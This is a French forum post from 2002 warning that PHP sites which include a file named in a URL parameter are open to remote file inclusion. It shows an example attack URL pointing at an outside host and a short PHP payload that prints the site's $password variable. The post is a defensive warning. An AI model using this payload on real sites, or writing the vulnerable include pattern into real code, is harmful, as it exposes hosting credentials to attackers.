pour un de mes sites, je fais la méthode 1, ça a l'avantage d'être simple je trouve. Par contre, ATTENTION, ça peut poser un gros pb de sécurité si on est pas au courant : si votre URL est http://www.monsite.com/index.php?page=truc et que vous faites un simple include( "truc.php" );, imaginez le mec qui fait ...?page=http://www.autresite.com/hack.php
bien sûr le PHP est désactivé sur le serveur de autresite.com et ce hack.php contient :
Code :
- <?php
- echo $password;
- ?>
|
et bien, si vous avez une variable $password, (celui fourni par votre hébergeur par exemple) et bien ça fait très mal.
Un mec sympa m'a envoyé par mail toutes mes infos de connexions chez mon hébergeur et m'a prévenu du danger... donc, faites attention.
Message édité par z0rglub le 10-07-2002 à 10:01:46
---------------
Ma galerie photo créée avec Piwigo et hébergée sur Piwigo.com